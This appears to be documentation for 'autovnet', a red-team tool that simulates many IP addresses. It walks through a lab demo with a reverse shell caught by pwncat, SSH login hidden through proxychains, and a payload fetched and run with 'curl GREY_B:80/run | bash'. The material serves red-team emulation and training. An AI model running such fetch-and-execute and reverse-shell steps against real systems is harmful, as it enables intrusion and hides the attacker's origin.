# Callback Demo

[TOC]

## Callback / End-to-End

Here, we see an end-to-end demo, showing how simple and easy is it to perform attacks that look very realistic, and sophisticated.

Remember, all `10.137.0.0/16` IPs are simulated by `autovnet`.

`autovnet` allows us to instantly obtain IP addresses that are ready to use.
To help clarify the workflow shown below, here is a reference table for IPs used and how we got them.
* We'll give each random IP a simple nickname like `GREY_X`
    - The point is that each IP is different. The IPs themselves are random and not important.

| Nickname | IP               | Purpose                        | Command Used                                            | Location                                                                                        |
| ---      | ---              | ---                            | ---                                                     | ---                                                                                             |
| `GREY_A` | `10.137.59.150`  | Catch a reverse shell (pwncat) | `autovnet rtfm pwncat 80`                               |  Step 1, bottom left (this IP is typed into the reverse shell payload in Step 2, bottom right)  |
| `GREY_B` | `10.137.99.131`  | Serve a payload (web server)   | `autovnet rtfm listen -p 8000 80`                       |  Step 1, top right                                                                              |
| `GREY_C` | `10.137.222.230` | SSH login from this IP         | `autovnet rtfm proxychains run -- ssh victim@target`    |  Step 3, bottom left (we don't see this IP until we check the value of `$SSH_CLIENT` in Step 7  |


1. Set up our Red Team infrastructure
    - `python` webserver on `RED:8000` to serve a payload
        * (top left, `python -m http.server`)
    - Forward for `GREY_A:80` -> local `pwncat` listener
        * (bottom left, `autovnet rtfm pwncat 80`)
    - Forward for `GREY_B:80` -> local web server
        * (top right, `autovnet rtfm listen -p 8000 80`)
2. Create a payload `bash reverse shell` to `GREY_A:80`
    * (bottom right, typed in `GRAY_A` IP)
3. `ssh` to `target` through `GREY_C` (`SSH_CLIENT`)
    * (bottom right, `autovnet rtfm proxychains run -- ssh victim@target`)
4. Use `curl` on the target to `GREY_B:80`, hitting the payload server
    * (botton right, typed in `GRAY_B` IP)
5. `curl GREY_B:80/run | bash` to execute the payload
    * (bottom right)
6. Catch the reverse shell sent to `GREY_A`
    * (bottom left, shell caught by `pwncat`)
7. Check `$SSH_CLIENT` to prove the `ssh` connection from (3) was obfuscated.
    * (bottom left, command runs on `target` and shows `GREY_C`, the IP that obfuscated our SSH login, since we used `autovnet rtfm proxychains run ...`)

![demo.01](../img/term/client/demo.01.svg)

Tada! We have passed the [acid tests](../rtfm/goals.md) and trivially emulated a sophisticated actor with control of many IP addresses, each used for different purposes.
